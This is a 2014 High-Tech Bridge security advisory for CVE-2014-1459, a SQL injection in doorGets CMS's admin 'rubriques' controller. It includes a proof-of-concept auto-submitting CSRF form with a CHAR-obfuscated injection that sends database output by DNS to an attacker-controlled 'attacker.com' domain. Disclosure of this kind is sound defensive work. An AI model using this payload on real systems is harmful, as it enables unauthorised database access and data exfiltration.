Lucene search

K
htbridgeHigh-Tech BridgeHTB23197
HistoryJan 15, 2014 - 12:00 a.m.

SQL Injection in doorGets CMS

2014-01-1500:00:00
High-Tech Bridge
www.htbridge.com
39

EPSS

0.002

Percentile

52.9%

High-Tech Bridge Security Research Lab discovered vulnerability in doorGets CMS, which can be exploited to perform SQL Injection attacks.

  1. SQL Injection in doorGets CMS: CVE-2014-1459
    The vulnerability exists due to insufficient validation of “_position_down_id” HTTP POST parameter passed to “/dg-admin/index.php” script. A remote attacker with access to administrative interface can execute arbitrary SQL commands in application’s database. This vulnerability however can be exploited by a remote unauthenticated user via CSRF vector.
    The following exploitation example is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will use a CSRF vector to send a DNS request demanding IP addess for version() (or any other sensetive output from the database) subdomain of “.attacker.com” (a domain name, DNS server of which is controlled by the attacker):
    <form action=“http://[host]/dg-admin/?controller=rubriques” method=“post” name=“main”>
    <input type=“hidden” name=“_position_down_id” value=“1 AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) – “>
    <input type=“hidden” name=”_position_down_position” value=“1”>
    <input type=“hidden” name=“_position_down_submit” value=“1”>
    <input type=“hidden” name=“_position_down_type” value=“down”>
    <input type=“submit” id=“btn”>
    </form>
    <script>
    document.getElementById(‘btn’).click();
    </scr ipt>